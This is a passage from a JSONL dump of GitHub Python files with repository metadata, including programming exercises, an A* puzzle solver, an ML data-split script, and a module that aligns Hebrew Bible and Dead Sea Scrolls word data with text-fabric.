flag:\n self.update_dvs()\n\n def processJson(self,m):\n distance_vector_neighbor_message = json.loads(m)\n sequence_number = distance_vector_neighbor_message[\"self_sequence_number\"]\n distance_vector_neighbor_message.pop('self_sequence_number')\n return distance_vector_neighbor_message,sequence_number\n\n def get_next_hop(self, destination):\n if destination in self.distance_vectors_self:\n return self.distance_vectors_self[destination].path[1]\n return -1","repo_name":"Shaoming827/projecr3","sub_path":"distance_vector_node.py","file_name":"distance_vector_node.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43605491174","text":"# Wrong output!\n\ndays = int(input())\nplayers_count = int(input())\ngroups_energy = float(input())\n\nwater_per_person = float(input())\nfood_per_person = float(input())\n\ntotal_water = water_per_person * players_count * days\ntotal_food = food_per_person * players_count * days\nis_over = False\n\nfor day in range(days):\n energy_loss = float(input())\n groups_energy -= energy_loss\n if groups_energy <= 0:\n is_over = True\n break\n if day % 2 == 0:\n groups_energy += groups_energy * 0.05\n total_water -= total_water * 0.30\n if day % 3 == 0:\n total_food -= total_food / players_count\n groups_energy += groups_energy * 0.10\n\nif is_over:\n print(f\"You will run out of energy. You will be left with {total_food:.2f} food and {total_water:.2f} water.\")\nelse:\n print(f\"You are ready for the quest. You will be left with - {groups_energy:.2f} energy!\")\n","repo_name":"ForbiddenBG/SoftUni","sub_path":"Fundamentals_Module/Exam_Preparation/Final_Exam/from_javaScript_to_python/the_hunting_games.py","file_name":"the_hunting_games.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18569594023","text":"def solve_e(n, a_list):\n days = 0\n ind_list = [0] * n\n match_count = 0\n queue = list(range(n))\n stack = dict()\n while len(queue) > 0:\n days += 1\n new_queue = []\n for p in queue:\n if ind_list[p] < n - 1:\n q = a_list[p][ind_list[p]] - 1\n k = str(min(p, q)) + \"_\" + str(max(p, q))\n if k in stack.keys():\n ind_list[p] += 1\n ind_list[q] += 1\n # print(days, p, q)\n new_queue.append(p)\n new_queue.append(q)\n match_count += 1\n else:\n stack[k] = 1\n queue = new_queue\n if match_count == n * (n - 1) // 2:\n return days - 1\n else:\n return -1\n\n\ndef test():\n n = 1000\n a_list = []\n for i in range(n):\n a_list.append(list(range(1, i + 1)) + list(range(i + 2, n + 1)))\n print(solve_e(n, a_list))\n\n\ndef main():\n n = int(input())\n a_list = []\n for _ in range(n):\n a_list.append(list(map(int, input().split())))\n print(solve_e(n, a_list))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"k-harada/AtCoder","sub_path":"ABC/ABC101-150/ABC139/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"37106669160","text":"\"\"\"\nThis script splits the provided dataframe in test and remainder\n\nDate: 07/March/2023\nDeveloper: ashbab khan\n\n\"\"\"\n\nimport argparse\nimport logging\nimport tempfile\nimport pandas as pd\nimport wandb\nfrom sklearn.model_selection import train_test_split\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\ndef go(args):\n \"\"\"\n this function will fetch the clean data artifact and then split it\n into two artifact train and test based on the test size we pass\n and the saved it into two different artifacts.\n\n \"\"\"\n\n run = wandb.init(job_type=\"train_val_test_split\")\n run.config.update(args)\n\n # Downloading input artifact. This will also note that this script is using this\n # particular version of the artifact\n logger.info(f\"Fetching artifact {args.input}\")\n artifact_local_path = run.use_artifact(args.input).file()\n\n df = pd.read_csv(artifact_local_path)\n\n logger.info(\"Splitting trainval and test\")\n trainval, test = train_test_split(\n df,\n test_size=args.test_size,\n random_state=args.random_seed,\n stratify=df[args.stratify_by] if args.stratify_by != 'none' else None,\n )\n\n # This loop will generate two artifacts\n for df, k in zip([trainval, test], ['trainval', 'test']):\n logger.info(f\"Uploading {k}_data.csv dataset\")\n with tempfile.NamedTemporaryFile(\"w\") as fp:\n\n # Saving the csv file\n df.to_csv(fp.name, index=False)\n\n # Creating a new Artifact\n artifact = wandb.Artifact(\n f\"{k}_data.csv\",\n f\"{k}_data\",\n f\"{k} split of data\"\n )\n\n # Adding the recently saved csv to the artifact\n artifact.add_file(fp.name)\n\n # Uploading the artifact to Weights and Biases\n run.log_artifact(artifact)\n artifact.wait()\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Split test and remainder\")\n\n parser.add_argument(\"--input\", type=str, help=\"Input artifact to split\")\n\n parser.add_argument(\n \"--test_size\",\n type=float,\n help=\"Size of the test split. Fraction of the dataset, or number of items\")\n\n parser.add_argument(\n \"--random_seed\",\n type=int,\n help=\"Seed for random number generator\",\n default=42,\n required=False)\n\n parser.add_argument(\n \"--stratify_by\",\n type=str,\n help=\"Column to use for stratification\",\n default='none',\n required=False)\n\n args = parser.parse_args()\n\n go(args)\n","repo_name":"ashbabkhan2/Building-an-ML-pipeline-for-short-term-rental-prices","sub_path":"components/train_val_test_split/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"35193059560","text":"N = int(input())\narr = list(map(int, input().split()))\n\nMAX_K = 6\nMAX_DIGIT = 10\n\ndef radix_sort():\n global arr\n\n p = 1\n for pos in range(MAX_K):\n new_arr = [[] for _ in range(MAX_DIGIT)]\n for elem in arr:\n digit = (elem // p) % 10\n new_arr[digit].append(elem)\n \n arr = []\n for digit in range(MAX_DIGIT):\n for elem in new_arr[digit]:\n arr.append(elem)\n \n p *= 10\n\nradix_sort()\n\nprint(*arr)","repo_name":"lbu0413/codetree-TILs","sub_path":"231125/기수 정렬 구현/implement-radix-sort.py","file_name":"implement-radix-sort.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12603149811","text":"#!/usr/bin/env python3\nfrom tile import Tile as Tile\nfrom game import Game\nfrom gui import Gui\nfrom operator import itemgetter\nfrom copy import deepcopy\n \n\nclass AStarSearch():\n __sqrToInt = {\n Tile.ZERO : 0,\n Tile.ONE : 1,\n Tile.TWO : 2,\n Tile.THREE : 3,\n Tile.FOUR : 4,\n Tile.BADZERO : 0,\n Tile.BADONE : 1,\n Tile.BADTWO : 2,\n Tile.BADTHREE : 3,\n Tile.BADFOUR : 4,\n }\n\n def __init__(self, game) -> None:\n self.game = game\n self.visited = set()\n self.queue = []\n\n def search(self):\n self.queue.append((self.game, self.h1(self.game), 0))\n\n while self.queue:\n current = self.queue.pop(0)\n\n if current[0] not in self.visited:\n self.visited.add(current[0])\n if current[0].isGameWon():\n self.game = current[0]\n break\n self.queue.extend(self.successors(current[0], current[2]))\n self.queue.sort(key = lambda x: x[1]+x[2])\n\n \n def h1(self, game):\n # sum of numers - sum of already satisfied numbers\n numbers = 0\n satisfaction = 0\n emptys = 0\n for rows in range(7):\n for columns in range(7):\n if game.board[rows][columns] in [Tile.ZERO, Tile.ONE, Tile.TWO, Tile.THREE, Tile.FOUR]:\n numbers += self.__sqrToInt[game.board[rows][columns]]\n satisfaction += self.__numOfLightsAround(game, rows, columns)\n return numbers - satisfaction\n \n def __numOfLightsAround(self, game, row, column):\n lights = 0\n \n if not row==0 and game.board[row-1][column] == Tile.LIGHT:\n lights += 1\n if not row==6 and game.board[row+1][column] == Tile.LIGHT:\n lights += 1\n if not column==0 and game.board[row][column-1] == Tile.LIGHT:\n lights += 1\n if not column==6 and game.board[row][column+1] == Tile.LIGHT:\n lights += 1\n \n return lights\n\n \n def successors(self, game, cost):\n nexts = []\n for rows in range(7):\n for columns in range(7):\n if game.board[rows][columns] == Tile.EMPTY:\n next = deepcopy(game)\n next.click(1, rows, columns)\n if next.isBoardStateLegit():\n h = self.h1(next)\n nexts.append((next, h, cost))\n return nexts\n\n\ndef main():\n pass\n\n###################################################\n\n\nif __name__ ==\"__main__\":\n main()","repo_name":"afeherzoli/LightUp","sub_path":"searches/a_star_search.py","file_name":"a_star_search.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15422883035","text":"#3) Verifique se um inteiro positivo n é primo.\nnumeroInteiro = int(input(\"Digite um número inteiro \\nResposta:\"))\nEncontrouDivisivel, numeroMultiplio = 0, 0\nif numeroInteiro <= 1:\n print('{} não é um número primo'.format(numeroInteiro))\nelse:\n while numeroMultiplio <= numeroInteiro or EncontrouDivisivel < 2:\n numeroMultiplio = numeroMultiplio + 1\n Encontrou = numeroInteiro % numeroMultiplio\n if Encontrou == 0:\n EncontrouDivisivel = EncontrouDivisivel + 1\n if EncontrouDivisivel <= 2:\n print(f\"{numeroInteiro} é um número primo\")\n else:\n print(f\"{numeroInteiro} não é um primo\")","repo_name":"BrunoSerpa/Exercicios-Python_ALP","sub_path":"Lista 03 (bônus)/Exercício03.py","file_name":"Exercício03.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25689095965","text":"\"\"\"\nHere the harmonization of BHSA and DSS data takes place. These are two different datasets with different conventions.\nThe overarching class is Corpus. A corpus contains data about all the relevant\nbiblical manuscripts. A Corpus object contains Scroll objects, and a scroll contains Verse objects and Word objects.\n\nThe scrolls include the biblical Dead Sea Scrolls and the Codex Leningradensis, here called MT.\n\nThe MT dataset is based on the text-fabric dataset Biblia Hebraica Stuttgartensia Amstelodamensis\n(see github.com/etcbc/bhsa).\nThe DSS dataset is based on the text-fabric dataset DSS (see github.com/etcbc/dss).\n\nTODO: add processing of SP data.\n\"\"\"\nfrom dataclasses import dataclass, field\n\nfrom add_hebrew_text_column import HebrewTextAdder\nfrom config import bhsa_version, dss_version, sp_version\nfrom special_data import j_lexemes, fem_end_words, fem_ending_numbers, relevant_wt_words\n\nfrom tf.app import use\nDSS = use('etcbc/dss:clone', checkout='clone', version=dss_version, provenanceSpec=dict(moduleSpecs=[]))\nFdss, Ldss, Tdss = DSS.api.F, DSS.api.L, DSS.api.T\n\nSP = use('dt-ucph/sp:clone', checkout='clone', version=sp_version, provenanceSpec=dict(moduleSpecs=[]))\nFsp, Lsp, Tsp = SP.api.F, SP.api.L, SP.api.T\n\nMT = use('etcbc/bhsa', version=bhsa_version)\nMT.load(['g_prs', 'g_nme', 'g_pfm', 'g_vbs', 'g_vbe'])\nF, L, T = MT.api.F, MT.api.L, MT.api.T\n\n\n@dataclass\nclass Word:\n \"\"\"prefix are concatenated g_cons of words prefixed to a word, often article or prep\"\"\"\n tf_word_id: int\n book: str\n chapter_num: int\n verse_num: int\n g_cons: str\n lex: str\n sp: str\n person: str\n number: str\n gender: str\n state: str\n vs: str\n vt: str\n lang: str\n rec_signs: str\n cor_signs: str\n stem: str = ''\n prs_cons: str = ''\n nme_cons: str = ''\n hloc: str = ''\n matres_pattern: str = ''\n prefix: str = ''\n heb_g_cons: str = ''\n g_pfm: str = ''\n g_vbs: str = ''\n g_vbe: str = ''\n stem_pattern = ''\n pattern = ''\n\n\n@dataclass\nclass Verse:\n manuscript: str\n bo: str\n ch: int\n ve: int\n words: list[Word] = field(default_factory=list)\n\n\nclass Scroll:\n scrolls = {}\n\n def __init__(self, scroll_name):\n self.scroll_name = scroll_name\n self.verses = {}\n self.words = []\n Scroll.scrolls[scroll_name] = self\n\n\nclass MTWordProcessor:\n \"\"\"\"\"\"\n def __init__(self, tf_id):\n\n self.prs_chars = {'>', 'D', 'H', 'J', 'K', 'M', 'N', 'W'}\n self.consonants = {'<', '>', 'B', 'C', 'D', 'F', 'G', 'H', 'J', 'K', 'L', 'M',\n 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'X', 'Y', 'Z', '#'}\n\n self.tf_id = tf_id\n self.book = F.book.v(tf_id)\n self.chapter_num = F.chapter.v(tf_id)\n self.verse_num = F.verse.v(tf_id)\n self.lexeme = F.lex.v(tf_id)\n self.glyphs = F.g_cons.v(tf_id)\n self.hloc = self.get_he_locale()\n self.sp = F.sp.v(tf_id)\n self.number = self.get_number()\n self.person = F.ps.v(tf_id)\n self.gender = self.get_gender()\n self.state = self.get_state()\n self.vs = F.vs.v(tf_id)\n self.vt = F.vt.v(tf_id)\n self.lang = F.language.v(tf_id)\n self.rec_signs = ''.join(['n' for char in self.glyphs])\n self.cor_signs = ''.join(['n' for char in self.glyphs])\n self.nme = self.get_nme()\n self.prs = self.get_prs()\n self.stem = self.get_stem()\n self.heb_text_adder = HebrewTextAdder(self.glyphs)\n self.heb_g_cons = self.heb_text_adder.get_hebrew_g_cons()\n self.g_pfm = self.get_pfm()\n self.g_vbs = self.get_vbs()\n self.g_vbe = self.get_vbe()\n\n def create_word(self):\n\n return Word(self.tf_id,\n self.book,\n self.chapter_num,\n self.verse_num,\n self.glyphs,\n self.lexeme,\n self.sp,\n self.person,\n self.number,\n self.gender,\n self.state,\n self.vs,\n self.vt,\n self.lang,\n self.rec_signs,\n self.cor_signs,\n stem=self.stem,\n prs_cons=self.prs,\n nme_cons=self.nme,\n hloc=self.hloc,\n heb_g_cons=self.heb_g_cons,\n g_pfm=self.g_pfm,\n g_vbs=self.g_vbs,\n g_vbe=self.g_vbe\n )\n\n def get_number(self):\n number = F.nu.v(self.tf_id)\n if number in {'unknown', 'NA'}:\n return None\n return number\n\n def get_gender(self):\n gender = F.gn.v(self.tf_id)\n if gender == 'NA':\n return None\n return gender\n\n def get_state(self):\n state = F.st.v(self.tf_id)\n if state == 'NA':\n return None\n return state\n\n def get_he_locale(self):\n if F.uvf.v(self.tf_id) == 'H':\n return 'H'\n return ''\n\n def get_prs(self):\n suff = F.g_prs.v(self.tf_id)\n # Cases like >DNJ in Genesis 19:2 (masc plural with prs)\n if suff == '+':\n suff = 'J'\n prs_cons = ''.join([ch for ch in suff if ch in self.prs_chars])\n return prs_cons\n\n def get_stem(self):\n stem = ''.join([ch for ch in F.g_lex.v(self.tf_id)\n if ch in self.consonants])\n if self.lexeme in relevant_wt_words and self.number == 'sg' \\\n and not stem.endswith('T') and self.nme.startswith('T'):\n stem += 'T'\n self.nme = self.nme.lstrip('T')\n elif self.lexeme in fem_ending_numbers:\n stem = stem[:-1]\n self.nme = 'T' + self.nme\n return stem\n\n def get_nme(self):\n g_nme = F.g_nme.v(self.tf_id)\n prs = F.g_prs.v(self.tf_id)\n # According to BHSA H is not nominal ending, but we strip it ad hoc.\n if self.lexeme == 'NGH/' and self.glyphs == 'NGH':\n g_nme = 'H'\n self.stem = 'NG'\n # Cases like >DNJ in Genesis 19:2 (masc plural with prs), decision: no nme, but prs\n if prs == '+':\n g_nme = g_nme.rstrip('J')\n nme_cons = ''.join([ch for ch in g_nme if ch in self.consonants])\n\n return nme_cons\n\n def get_vbs(self):\n vbs_cons = ''.join([ch for ch in F.g_vbs.v(self.tf_id) if ch in self.consonants])\n return vbs_cons\n\n def get_pfm(self):\n pfm_cons = ''.join([ch for ch in F.g_pfm.v(self.tf_id) if ch in self.consonants])\n return pfm_cons\n\n def get_vbe(self):\n vbe_cons = ''.join([ch for ch in F.g_vbe.v(self.tf_id) if ch in self.consonants])\n return vbe_cons\n\n\ndef parse_nme_dss(stem, lex, state, nu, gn, sp, prs):\n \"\"\"\n :param stem: initial stem (needs further parsing)\n :param lex: lexeme\n :param state: state a or c\n :param nu: number\n :param gn: gender\n :param sp: part of speech\n :param prs: pronominal suffix\n :return: stem and nme\n \"\"\"\n nme = ''\n lex_no_special_signs = lex.strip('/').strip('=')\n\n if lex in j_lexemes:\n if prs and stem.endswith('JJ') and nu == 'pl':\n stem = stem.removesuffix('J')\n nme += 'J'\n else:\n if prs and stem.endswith('J') and nu == 'pl':\n stem = stem.removesuffix('J')\n nme += 'J'\n\n if sp == 'adjv' and len(lex) > 1 and stem.endswith('H') and lex_no_special_signs[-1] != 'H':\n stem = stem.removesuffix('H')\n nme += 'H'\n elif sp == 'adjv' and len(lex) > 1 and stem.endswith('T') and lex_no_special_signs[-1] != 'T' and nu == 'sg':\n stem = stem.removesuffix('T')\n nme += 'T'\n elif sp == 'adjv' and len(lex) > 1 and stem.endswith('TJ') and lex_no_special_signs[-2:] != 'TJ' and nu == 'sg':\n stem = stem.removesuffix('TJ')\n nme += 'TJ'\n elif sp == 'adjv' and lex_no_special_signs[-1] == 'J' and len(lex) > 1 and stem.endswith('JM'):\n stem = stem.removesuffix('JM')\n nme += 'JM'\n elif sp == 'adjv' and lex_no_special_signs[-1] == 'J' and len(lex) > 1 and stem.endswith('JN'):\n stem = stem.removesuffix('JN')\n nme += 'JN'\n elif sp == 'adjv' and lex_no_special_signs[-1] == 'J' and len(lex) > 1 and stem.endswith('WT'):\n stem = stem.removesuffix('WT')\n nme += 'WT'\n elif sp == 'adjv' and lex_no_special_signs[-1] == 'J' and len(lex) > 1 and stem.endswith('T'):\n stem = stem.removesuffix('T')\n nme += 'T'\n\n if (stem.endswith('J') and state == 'c' and nu in {'du', 'pl'} and lex not in j_lexemes) or \\\n (stem.endswith('J') and sp == 'prep'):\n stem = stem.removesuffix('J')\n nme += 'J'\n elif stem.endswith('W') and sp == 'prep':\n stem = stem.removesuffix('W')\n nme += 'W'\n elif lex in j_lexemes and stem.endswith('JJM') and len(stem) > 3:\n stem = stem.removesuffix('JM')\n nme = 'JM' + nme\n elif lex in j_lexemes and stem.endswith('JM') and len(stem) > 2:\n stem = stem.removesuffix('M')\n nme = 'M' + nme\n elif lex not in j_lexemes and stem.endswith('JM') and nu in {'du', 'pl'} and len(stem) > 2:\n stem = stem.removesuffix('JM')\n nme = 'JM' + nme\n elif lex not in j_lexemes and stem.endswith('M') and nu in {'du', 'pl'} and len(stem) > 2 and (lex_no_special_signs[-1] != 'M' or lex == '>LHJM/'):\n stem = stem.removesuffix('M')\n nme = 'M' + nme\n\n if stem.endswith('WT') and nu == 'pl':\n stem = stem.removesuffix('WT')\n nme = 'WT' + nme\n if stem.endswith('WTJ') and nu == 'pl':\n stem = stem.removesuffix('WTJ')\n nme = 'WTJ' + nme\n elif stem.endswith('T') and nu == 'pl' and gn == 'f':\n stem = stem.removesuffix('T')\n nme = 'T' + nme\n\n if lex_no_special_signs[-1] == 'H' and nu == 'sg':\n if stem.endswith('TJ'):\n stem = stem.removesuffix('TJ')\n nme = 'TJ' + nme\n elif stem[-1] == 'T':\n stem = stem.removesuffix('T')\n nme = 'T' + nme\n elif stem[-1] == 'H' and lex != '>LWH/':\n stem = stem.removesuffix('H')\n nme = 'H' + nme\n\n # Ugly ad hoc solution for Jer 17:18 in 4Q70. Better solution?\n if lex == 'CBRWN/' and stem == 'CBRWNM':\n stem = 'CBRWN'\n nme = 'M'\n\n # Aramaic plural\n if stem.endswith('JN') and gn == 'm' and nu == 'pl' and not nme:\n stem = stem[:-2]\n nme = 'JN'\n\n # Ugly hardcoded solution for H/> exchange\n if lex in {'DBWRH/', 'GBWRH/', 'PLJVH/', 'MNWSH/', 'MBWSH/', 'PH/', 'DWD=/'} and stem.endswith('>'):\n stem = stem[:-1]\n nme = '>' + nme\n\n if lex in fem_ending_numbers:\n if stem.endswith('T'):\n stem = stem[:-1]\n nme = 'T' + nme\n\n if lex in fem_end_words:\n if nu == 'pl' and stem.endswith('T'):\n stem = stem[:-1]\n nme = 'T' + nme\n elif nu == 'pl' and stem.endswith('WT'):\n stem = stem[:-2]\n nme = 'WT' + nme\n\n if lex == 'CWCN/' and stem.endswith('H'):\n stem = stem.rstrip('H')\n nme += 'H'\n\n if lex == 'CLC/' and stem.endswith('H'):\n stem = stem.rstrip('H')\n nme = 'H' + nme\n\n if lex == 'GDL/' and stem.endswith('H'):\n stem = stem.rstrip('H')\n nme = 'H' + nme\n\n if lex == 'XV>/' and stem.endswith('H'):\n stem = stem.rstrip('H')\n nme = 'H' + nme\n\n if lex == 'P'):\n stem = stem.rstrip('>')\n nme = '>' + nme\n\n return stem, nme\n\n\nclass DSSWordProcessor:\n \"\"\"\"\"\"\n def __init__(self, tf_id):\n self.tf_id = tf_id\n self.book = Fdss.book_etcbc.v(tf_id)\n self.chapter_num = Fdss.chapter.v(tf_id)\n self.verse_num = Fdss.verse.v(tf_id)\n self.lexeme = Fdss.lex_etcbc.v(tf_id)\n self.glyphs = None\n self.hloc = self.get_he_locale()\n self.prs = ''\n self.nme = ''\n self.sp = Fdss.sp_etcbc.v(tf_id)\n self.number = self.get_number()\n self.person = Fdss.ps_etcbc.v(tf_id)\n self.gender = self.get_gender()\n self.state = self.get_state()\n self.vs = Fdss.vs_etcbc.v(tf_id)\n self.vt = Fdss.vt_etcbc.v(tf_id)\n self.lang = Fdss.lang_etcbc.v(tf_id)\n self.rec_signs = None\n self.cor_signs = None\n self.heb_g_cons = ''\n if Fdss.glyphe.v(tf_id):\n self.glyphs = self.preprocess_text()\n self.rec_signs = self.get_reconstructed_signs()\n self.cor_signs = self.get_corrected_signs()\n self.heb_text_adder = HebrewTextAdder(self.glyphs)\n self.heb_g_cons = self.heb_text_adder.get_hebrew_g_cons()\n self.stem = self.glyphs\n if self.stem:\n self.stem = self.stem.removesuffix(self.hloc).removesuffix(self.prs)\n if self.lexeme:\n self.parse_nme()\n if Fdss.morpho.v(self.tf_id):\n if self.sp == 'verb' and Fdss.morpho.v(self.tf_id)[-1] == 'h':\n self.stem = self.stem.rstrip('H')\n self.g_pfm = self.get_pfm() # So far only for hifil triliteral!!\n self.g_vbs = self.get_vbs() # So far only for hifil triliteral!!\n self.g_vbe = self.get_vbe()\n self.prefix = self.parse_prefix_g_cons_dss()\n\n def create_word(self):\n\n return Word(self.tf_id,\n self.book,\n self.chapter_num,\n self.verse_num,\n self.glyphs,\n self.lexeme,\n self.sp,\n self.person,\n self.number,\n self.gender,\n self.state,\n self.vs,\n self.vt,\n self.lang,\n self.rec_signs,\n self.cor_signs,\n prs_cons=self.prs,\n nme_cons=self.nme,\n hloc=self.hloc,\n heb_g_cons=self.heb_g_cons,\n prefix=self.prefix,\n stem=self.stem,\n g_pfm=self.g_pfm,\n g_vbs=self.g_vbs,\n g_vbe=self.g_vbe\n )\n\n def preprocess_text(self):\n \"\"\"\n Remove spaces that occur in data (and also in manuscript!).\n \"\"\"\n glyphs = Fdss.glyphe.v(self.tf_id)\n if glyphs:\n glyphs = ''.join(glyphs.split())\n glyphs = self.disambiguate_sin_shin(glyphs)\n glyphs = self.replace_final_characters(glyphs)\n glyphs = self.get_pronominal_suffix(glyphs)\n\n return glyphs\n\n def get_reconstructed_signs(self):\n \"\"\"\n Returns string with indication of which signs are reconstructed (\"r\")\n and which signs are not reconstructed (\"n\").\n \"\"\"\n signs = Ldss.d(self.tf_id, 'sign')\n return ''.join(['r' if Fdss.rec.v(s) == 1 else 'n' for s in signs if Fdss.type.v(s) == 'cons'])\n\n def get_corrected_signs(self):\n \"\"\"\n Returns string with indication of which signs are corrected:\n 0: not a corrected sign\n 1: corrected by a modern editor\n 2: corrected by an ancient editor\n 3: corrected by an ancient editor, supralinear\n \"\"\"\n signs = Ldss.d(self.tf_id, 'sign')\n return ''.join(['c' if Fdss.cor.v(s) == 1 else 'n' for s in signs if Fdss.type.v(s) == 'cons'])\n\n def disambiguate_sin_shin(self, glyphs):\n \"\"\"\n The consonant '#' is used for both 'C' and 'F'. We check in the lexeme\n to which of the two alternatives it should be converted. This appproach is crude,\n but works generally well. There is only one word with both F and C in the lexeme:\n >RTX##T> >AR:T.AX:CAF:T.:> in 4Q117\n \"\"\"\n if '#' in glyphs:\n # hardcode the single word with both 'C' and 'F' in the lexeme.\n if glyphs == '>RTX##T>':\n glyphs = '>RTXCFT>'\n\n elif 'F' in self.lexeme:\n glyphs = glyphs.replace('#', 'F')\n else:\n glyphs = glyphs.replace('#', 'C')\n\n return glyphs\n\n @staticmethod\n def replace_final_characters(glyphs):\n \"\"\"\n - Replaces space '\\xa0' with ' '.\n - Replaces special final characters with ordinary characters in ETCBC transcription.\n \"\"\"\n glyphs = glyphs.replace(u'\\xa0', u' ') \\\n .replace('k', 'K') \\\n .replace('n', 'N') \\\n .replace('m', 'M') \\\n .replace('y', 'Y') \\\n .replace('p', 'P')\n return glyphs\n\n def get_he_locale(self):\n \"\"\"\n Retrieve he locale from feature uvf_etcbc.\n\n \"\"\"\n if Fdss.uvf_etcbc.v(self.tf_id) == 'H':\n return 'H'\n return ''\n\n def get_pronominal_suffix(self, glyphs):\n \"\"\"\n Check for ' in glyphs and check if it is a he locale.\n If not, then it is a pronominal suffix.\n \"\"\"\n if \"'\" in glyphs and not self.hloc:\n self.prs = glyphs.split(\"'\")[1]\n\n glyphs = glyphs.replace(\"'\", '')\n return glyphs\n\n def parse_nme(self):\n self.stem, self.nme = parse_nme_dss(self.stem, self.lexeme, self.state, self.number, self.gender, self.sp, self.prs)\n\n def get_number(self):\n \"\"\"\n Number values are {'NA', 'du', 'pl', 'sg', 'unknown'}.\n We remove the unknowns.\n \"\"\"\n number = Fdss.nu_etcbc.v(self.tf_id)\n if number == 'unknown':\n return None\n return number\n\n def get_gender(self):\n gender = Fdss.gn_etcbc.v(self.tf_id)\n if gender not in {'m', 'f'}:\n return None\n return gender\n\n def get_state(self):\n state = Fdss.st.v(self.tf_id)\n if not state:\n return None\n return state\n\n def get_vbs(self):\n \"\"\"So far only implemented for hiphil.\n Check if relevant tense has valid value and glyphs start with H.\n Returns H if present and adapts stem accordingly.\n \"\"\"\n if self.vs == 'hif' and self.vt in {'perf', 'impv', 'infa', 'infc'} and self.lexeme and self.glyphs:\n if self.lexeme[0] != 'H' and self.glyphs[0] == 'H':\n self.stem = self.stem[1:]\n return 'H'\n else:\n return ''\n\n def get_pfm(self):\n \"\"\"Only implemented for hiphil.\"\"\"\n if self.vs == 'hif' and self.lexeme and self.glyphs:\n if self.vt == 'ptca' and self.glyphs[0] == 'M':\n self.stem = self.stem[1:]\n return 'M'\n elif self.vt in {'impf', 'wayq'}:\n if self.person in {'p2', 'p3'} and self.glyphs[0] == 'T':\n self.stem = self.stem[1:]\n return 'T'\n elif self.person == 'p3' and self.glyphs[0] == 'J':\n self.stem = self.stem[1:]\n return 'J'\n elif self.person == 'p1' and self.glyphs[0] in {'>', 'N'}:\n self.stem = self.stem[1:]\n return self.glyphs[0]\n else:\n return ''\n else:\n return ''\n\n def get_vbe(self):\n \"\"\"Only implemented for hiphil.\"\"\"\n perf_dict = {\n ('m', 'sg', 'p3'): '',\n ('m', 'sg', 'p2'): 'T',\n ('f', 'sg', 'p3'): 'H',\n ('f', 'sg', 'p2'): 'T',\n ('unknown', 'sg', 'p1'): 'TJ',\n ('unknown', 'pl', 'p3'): 'W',\n ('m', 'pl', 'p3'): 'W',\n ('m', 'pl', 'p2'): 'TM',\n ('f', 'pl', 'p2'): 'TN',\n ('unknown', 'pl', 'p1'): ''\n }\n\n impf_dict = {\n ('m', 'sg', 'p3'): '',\n ('m', 'sg', 'p2'): '',\n ('f', 'sg', 'p3'): '',\n ('f', 'sg', 'p2'): 'J',\n ('unknown', 'sg', 'p1'): '',\n ('m', 'pl', 'p3'): 'W',\n ('m', 'pl', 'p2'): 'W',\n ('f', 'pl', 'p3'): 'NH',\n ('f', 'pl', 'p2'): 'NH',\n ('unknown', 'pl', 'p1'): ''\n }\n\n impv_dict = {\n ('m', 'sg', 'NA'): '',\n ('f', 'sg', 'NA'): 'J',\n ('m', 'pl', 'NA'): 'W',\n ('f', 'pl', 'NA'): 'NH',\n }\n\n if self.vs == 'hif' and self.lexeme and self.glyphs:\n if self.book:\n gn, nu, ps = self.gender, self.number, self.person\n if gn in {'', None}:\n gn = 'unknown'\n\n if self.vt == 'perf':\n vbe = perf_dict[(gn, nu, ps)]\n if (gn, nu, ps) == ('unknown', 'pl', 'p3') and self.stem.endswith('J'):\n vbe = 'J' # single case in 1Qisaa, tf_id = 1899343\n elif self.vt == 'impf':\n vbe = impf_dict[(gn, nu, ps)]\n elif self.vt == 'impv':\n vbe = impv_dict[(gn, nu, ps)]\n if vbe == 'NH' and self.lexeme[-2] == 'N':\n vbe = 'H'\n else:\n vbe = ''\n if self.stem.endswith(vbe):\n self.stem = self.stem.rstrip(vbe)\n return vbe\n else:\n return ''\n else:\n return ''\n return ''\n\n def parse_prefix_g_cons_dss(self):\n prefix = ''\n previous_word_id = self.tf_id - 1\n while Fdss.after.v(previous_word_id) is None:\n prev_word_g_cons = Fdss.g_cons.v(previous_word_id)\n if prev_word_g_cons is None:\n prev_word_g_cons = ''\n prefix = prev_word_g_cons + prefix\n previous_word_id = previous_word_id - 1\n return prefix\n\n\nclass SPWordProcessor:\n \"\"\"\"\"\"\n def __init__(self, tf_id, sp_word_nodes):\n self.prs_chars = {'>', 'D', 'H', 'J', 'K', 'M', 'N', 'W'}\n self.consonants = {'<', '>', 'B', 'C', 'D', 'F', 'G', 'H', 'J', 'K', 'L', 'M',\n 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'X', 'Y', 'Z', '#'}\n self.tf_id = tf_id\n self.sp_word_nodes = sp_word_nodes\n self.book = Fsp.book.v(tf_id)\n self.chapter_num = Fsp.chapter.v(tf_id)\n self.verse_num = Fsp.verse.v(tf_id)\n self.lexeme = Fsp.lex.v(tf_id)\n self.glyphs = Fsp.g_cons.v(tf_id)\n self.hloc = self.get_he_locale()\n self.sp = Fsp.sp.v(tf_id)\n self.number = self.get_number()\n self.person = Fsp.ps.v(tf_id)\n self.gender = self.get_gender()\n self.state = self.get_state()\n self.vs = None # Todo: implement verbals stem\n self.vt = Fsp.vt.v(tf_id)\n self.lang = Fsp.language.v(tf_id)\n 